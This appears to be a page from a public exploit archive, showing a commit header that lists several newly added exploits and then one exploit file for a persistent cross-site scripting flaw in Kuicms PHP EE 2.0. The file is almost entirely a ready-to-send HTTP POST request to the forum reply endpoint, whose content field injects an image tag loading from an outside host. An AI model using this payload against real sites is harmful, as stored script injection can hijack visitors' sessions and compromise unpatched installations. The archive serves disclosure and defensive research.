d7ce1d69e6
7 changes to exploits/shellcodes BIND - 'TSIG' Denial of Service Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting OXID eShop 6.3.4 - 'sorting' SQL Injection
25 lines
No EOL
989 B
Text
25 lines
No EOL
989 B
Text
# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting
|
|
# Date: 2020-05-27
|
|
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
|
|
# Vendor Homepage: https://kuicms.com
|
|
# Software Link: https://kuicms.com/kuicms.zip
|
|
# Version: Kuicms Php EE 2.0
|
|
# Tested on: Windows
|
|
# CVE : N/A
|
|
|
|
Vulnerable Request:
|
|
POST /web/?c=bbs&a=reply&id=1 HTTP/1.1
|
|
Host: 172.16.166.137
|
|
Content-Length: 56
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
X-Requested-With: XMLHttpRequest
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Origin: http://172.16.166.137
|
|
Referer: http://172.16.166.137/web/?m=bbsshow&id=1
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|
Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6
|
|
Connection: close
|
|
|
|
content=</div>test<img src=//xsshs.cn/8jhh/xss.jpg><div> |